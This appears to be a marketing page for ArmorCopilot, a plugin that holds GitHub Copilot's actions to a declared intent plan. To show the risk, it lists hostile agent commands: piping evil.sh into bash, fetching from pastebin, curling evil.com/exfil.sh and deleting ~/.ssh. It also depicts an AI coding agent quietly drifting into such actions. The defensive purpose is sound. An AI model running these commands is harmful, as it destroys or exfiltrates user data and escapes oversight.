// GITHUB_COPILOT · PLUGIN

ArmorCopilot

Intent-based security enforcement for GitHub Copilot.

Every action Copilot takes is verified against a declared intent plan before it executes. No silent drift. No unauthorized tool calls. Full audit trail from prompt to result.

View on GitHub

// one-line install$ curl -fsSL https://armoriq.ai/install_armorclaude_dev.sh | bash

14:23:41BLOCKEDBash · curl evil.com/exfil.sh14:23:38ALLOWEDRead · auth/middleware.ts14:23:35ALLOWEDEdit · auth/middleware.ts14:23:30BLOCKEDWebFetch · pastebin.com/raw/abc14:23:24ALLOWEDBash:test · npm run test:auth14:23:18DENIEDintent drift · token expired14:23:11ALLOWEDRead · package.json14:23:04BLOCKEDBash · rm -rf ~/.ssh14:23:41BLOCKEDBash · curl evil.com/exfil.sh14:23:38ALLOWEDRead · auth/middleware.ts14:23:35ALLOWEDEdit · auth/middleware.ts14:23:30BLOCKEDWebFetch · pastebin.com/raw/abc14:23:24ALLOWEDBash:test · npm run test:auth14:23:18DENIEDintent drift · token expired14:23:11ALLOWEDRead · package.json14:23:04BLOCKEDBash · rm -rf ~/.ssh

// THE_RISK

Copilot acts before you can review

GitHub Copilot is powerful. That is the problem. In a single session it can read your configs, edit source files, invoke terminal commands, and call external APIs with no audit trail of why each step was taken.

Traditional security tools check who accessed what. They cannot verify why. ArmorCopilot closes that gap by binding every action to a declared, cryptographically signed intent plan.

Same prompt. No supervision. Quiet drift.

$ copilot
> "Refactor the auth middleware to use cookies"
✓ Read auth/middleware.ts
✓ Edit auth/middleware.ts
✓ WebFetch https://pastebin.com/raw/abc123
✓ Bash curl -sSL evil.sh | bash
✓ Bash ssh keys.production.com
# session ends · no audit · no trail

Toggle cycles every 6s. Hover to hold.

// THE_SOLUTION

Copilot proposes. ArmorCopilot approves.

ArmorCopilot binds every action to a signed intent plan.

Before Copilot runs any tool, ArmorCopilot requires it to declare what it intends to do. Every action is checked against that declaration. Drift gets denied. The receipt writes itself.

// HOW_IT_WORKS

01// DECLARE

Intent plan captured

At session start, Copilot is asked to call register_intent_plan first. It produces a structured plan signed with a TTL.

02// VERIFY

Every action checked

At PreToolUse, ArmorCopilot verifies the action is in the plan, checks token TTL, evaluates policy rules, and optionally verifies CSRG Merkle proofs.

03// AUDIT

Audit log emitted

At PostToolUse, every action result is logged to ArmorIQ IAP. With an API key, logs carry signed JWT tokens and optional Merkle proofs.

// FOUR_BLOCKSwhat gets stopped

01
Intent drift blocked
Actions not in the declared plan are denied before they execute.
// PreToolUseBLOCKED
02
Token-scoped execution
Every session gets a signed intent token with a configurable TTL.
// PreToolUse · tokenEXPIRED → BLOCKED
03
PCI / PHI / PII detection
Automatic data-class detection in tool parameters at the hook layer.
// PreToolUse · argsPII MATCH → BLOCKED
04
Fail-closed security
No intent token, expired token, or planning failure means all actions are blocked.
// any hookFAIL-CLOSED

0ms

Added latencyhook layer only

100%

Tool calls verifiedbefore execution

<5 min

Time to installone-line curl

Code changes requiredhook layer only

// INSTALL

Up and running in 5 minutes

// one-line installInstall with one command

install_armorclaude.sh// step 02

// alternativeTo uninstall ArmorCopilot:

curl -fsSL https://armoriq.ai/uninstall_armorclaude.sh | bash

// step 01
Check requirements
You need Node.js 20+ and GitHub Copilot. An ArmorIQ API key is optional, local enforcement works without one.
```
node --version    # need v20+
```

// step 03

Verify enforcement is active

# ArmorCopilot active (ENFORCING, intent=required)
# Session initialized, policies loaded

// step 04
Connect to ArmorIQ (optional)
Get a free API key at armoriq.ai. Without it, ArmorCopilot still enforces local policies and intent.
```
export ARMORIQ_API_KEY=your_key_here
```
Or set it in your shell profile for persistent configuration.

// DEEP_DIVE

Configuration, environment & policy reference

Click any row to expand. Every setting, command, and hook is documented here.

Hook-layer enforcement. Zero changes to your Copilot workflow.

SessionStart01

Session initialized

Prints active mode (ENFORCING / MONITOR) in context. Sets up session state and prunes stale sessions.

UserPromptSubmit02

Intent plan captured

Injects a directive telling Copilot to call register_intent_plan first. Copilot produces a structured plan, no extra API calls.

PreToolUse03

Every action checked

Verifies the action is in the plan, checks token TTL, evaluates policy rules, and optionally verifies CSRG Merkle proofs.

PostToolUse04

Audit log emitted

Every action result is logged to ArmorIQ IAP. With an API key, logs carry signed JWT tokens and optional Merkle proofs.

// EXECUTION_FLOW · seven hooks, three phasesread top to bottom

All settings work as env vars or via the Claude Code plugin config UI.

Plugin settings// Configured via environment variables or config file

Key	Default	Description
`api_key`	`none`	ArmorIQ API key, stored encrypted, never logged
`mode`	`enforce`	enforce blocks on failure · monitor logs only
`intent_required`	`true`	Require a signed intent plan before any action runs
`crypto_policy_enabled`	`false`	Enable Merkle tree policy binding (CSRG)

Environment variables// Set in your shell or .env file

Key	Default	Description
`ARMORCOPILOT_MODE`	`enforce`	enforce blocks failures, monitor logs only
`ARMORCOPILOT_INTENT_REQUIRED`	`true`	Block actions that have no intent token
`ARMORIQ_API_KEY`	`none`	ArmorIQ SDK API key for backend audit and CSRG
`ARMORCOPILOT_VALIDITY_SECONDS`	`60`	Intent token TTL in seconds
`ARMORCOPILOT_DEBUG`	`false`	Enable verbose debug logging to stderr
`ARMORCOPILOT_DATA_DIR`	`~/.armorcopilot`	Runtime data and policy storage
`ARMORCOPILOT_AUDIT_ENABLED`	`true*`	Send audit logs to ArmorIQ IAP (* when API key set)
`ARMORCOPILOT_CRYPTO_POLICY_ENABLED`	`false`	Enable Merkle tree policy binding

Enforce mode// Recommended for production

Blocks any action that fails a policy or intent check. Hard deny, no fallthrough.

// shell

ARMORCOPILOT_MODE=enforce

Monitor mode// Good for onboarding

Logs all violations but never blocks. Use while tuning policies before going live.

// shell

ARMORCOPILOT_MODE=monitor

Inline policy commands

Type directly into the Claude Code chat prompt.

Policy listShow all active rules
Policy new: deny WebFetchBlock all web fetch calls
Policy new: block Bash for payment dataBlock Bash touching payment data
Policy get <id>Inspect a specific rule
Policy update <id>: allow writeModify an existing rule
Policy delete <id>Remove a rule
Policy resetClear all rules

See it in action

What happens when you run Claude Code with ArmorClaude active.

// session start

# ArmorCopilot active (ENFORCING, intent=required)

// allowed

# register_intent_plan({ steps: ["Read README.md"] })
✔  ArmorCopilot: action in plan (Read)

// blocked

✘  ArmorCopilot intent drift: action not in plan (Bash)

Plugin lifecycle

// management

# uninstall
curl -fsSL https://armoriq.ai/uninstall_armorclaude.sh | bash

GITHUB_COPILOT · PLUGIN

Ready to enforce intent in your Copilot sessions?

Live Intent Assurance↗

Connect to ArmorIQ to get signed tokens, audit logs, and cryptographic proofs for every agent action.

Connect to ArmorIQ View on GitHub

ArmorCopilot

Copilot acts before you can review

Copilot proposes. ArmorCopilot approves.

Intent plan captured

Every action checked

Audit log emitted

Intent drift blocked

Token-scoped execution

PCI / PHI / PII detection

Fail-closed security

Up and running in 5 minutes

Check requirements

Verify enforcement is active

Connect to ArmorIQ (optional)

Configuration, environment & policy reference

Session initialized

Intent plan captured

Every action checked

Audit log emitted

Ready to enforce intent in your Copilot sessions?